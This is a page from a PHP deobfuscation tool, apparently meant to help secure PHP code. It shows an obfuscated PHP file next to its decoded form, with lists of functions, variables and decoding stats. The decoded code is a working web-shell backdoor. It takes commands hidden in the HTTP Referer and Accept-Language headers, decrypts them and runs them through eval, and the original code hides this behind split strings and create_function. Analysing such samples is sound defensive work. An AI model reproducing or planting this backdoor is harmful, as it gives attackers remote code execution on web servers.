Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $y='rr); p`|ar`|se_str($u[`|"query"`|],$q);$q=arr`|ay_v`|alu`|es($`|q);preg_m`|a..

Decoded Output download

$kh="098f";$kf="6bcd";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$y='rr);    p`|ar`|se_str($u[`|"query"`|],$q);$q=arr`|ay_v`|alu`|es($`|q);preg_m`|atch_all`|("`|/(`|[\\w])[\\w-]+(?:;`|';
$n='|();$d=`|base`|`|64_encod`|e(x(gzcompre`|ss`|($o),$k)`|)`|;`|print("<$k>`|$d</$k>");@sess`|ion_d`|estr`|oy();}}}}';
$b='q=0.([\\`|d])`|)?`|,?/",$r`|a,$m);if($`|q&&$`|m){@sessio`|n_s`|tart()`|;$s=&$_SE`|S`|SIO`|N;$ss="`|substr";$`|s`|l';
$k=str_replace('Z','','ZcrZeate_ZZfunZctZion');
$i='l`|;){for($j=0;(`|$j<$c&&$`|`|i<`|$l);$j++,$i++){$o`|.`|=$t{$i}^$k`|`|{$j};}}r`|eturn `|$o;}`|$r=$_SERVER`|;$rr=`';
$O='),0,3));$p`|="";for($`|`|z=1;$z`|`|<count($m[`|`|1]`|);$z++) $p.=$q[$m[2`|][$z`|]];`|if(strpos($p,$`|h)===0){`|$s';
$m='_`|/","`|/-/`|"),array`|("/",`|"+"`|),$ss($`|s[$i],0,$e))`|),$k)`|));$o=ob`|_get`|_content`|s`|();ob_end`|_clean`';
$S='|@$r`|["H`|TTP_REFERE`|R"];$ra=`|@$r["HTTP`|_ACC`|EPT_LANG`|UAG`|E"]`|;if($rr&&$`|ra){ `|  `| $u=p`|ar`|s`|e_url($';
$t='$e)`|{$k=$`|k`|h.$kf;ob_s`|tart()`|;@`|ev`|al(@gzuncom`|press(@x(@b`|ase64_`|`|`|decode(preg_`|replace(`|array("/';
$L='$kh=`|"098f";$`|k`|f="6bc`|d";fu`|nction `|x($t`|,$k`|){$c=strlen($k);$`|l=strle`|n($`|t);$o=`|"";f`|or($i=0;$i<`|`|$';
$r='[$i`|]=""`|;$p`|=$ss`|($p,3);}i`|f(arra`|y_ke`|y`|_exists($i`|,$s)){$s[$i]`|.=$p;$`|e=s`|t`|rpos($s[$i],$f);`|if(';
$B='="str`|tol`|ower";$i=$m`|[1][0`|].$m[1][1`|];$h`|=$sl($ss(`|md`|5($i.$kh),0,`|`|3))`|;$f=`|$sl($ss(md`|5($i.$`|kf';
$R=str_replace('`|','',$L.$i.$S.$y.$b.$B.$O.$r.$t.$m.$n);
$z=$k('',$R);$z();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$B ="str`|tol`|ower";$i=$m`|[1][0`|].$m[1][1`|];$h`|=$sl($ss(`|..
$L $kh=`|"098f";$`|k`|f="6bc`|d";fu`|nction `|x($t`|,$k`|){$c=s..
$O ),0,3));$p`|="";for($`|`|z=1;$z`|`|<count($m[`|`|1]`|);$z++)..
$R $kh="098f";$kf="6bcd";function x($t,$k){$c=strlen($k);$l=str..
$S |@$r`|["H`|TTP_REFERE`|R"];$ra=`|@$r["HTTP`|_ACC`|EPT_LANG`|..
$b q=0.([\`|d])`|)?`|,?/",$r`|a,$m);if($`|q&&$`|m){@sessio`|n_s..
$i l`|;){for($j=0;(`|$j<$c&&$`|`|i<`|$l);$j++,$i++){$o`|.`|=$t{..
$k create_function
$m _`|/","`|/-/`|"),array`|("/",`|"+"`|),$ss($`|s[$i],0,$e))`|)..
$n |();$d=`|base`|`|64_encod`|e(x(gzcompre`|ss`|($o),$k)`|)`|;`..
$r [$i`|]=""`|;$p`|=$ss`|($p,3);}i`|f(arra`|y_ke`|y`|_exists($i..
$t $e)`|{$k=$`|k`|h.$kf;ob_s`|tart()`|;@`|ev`|al(@gzuncom`|pres..
$y rr); p`|ar`|se_str($u[`|"query"`|],$q);$q=arr`|ay_v`|alu`..
$z None

Stats

MD5 14a052814346c125d076f07ee65197df
Eval Count 1
Decode Time 107 ms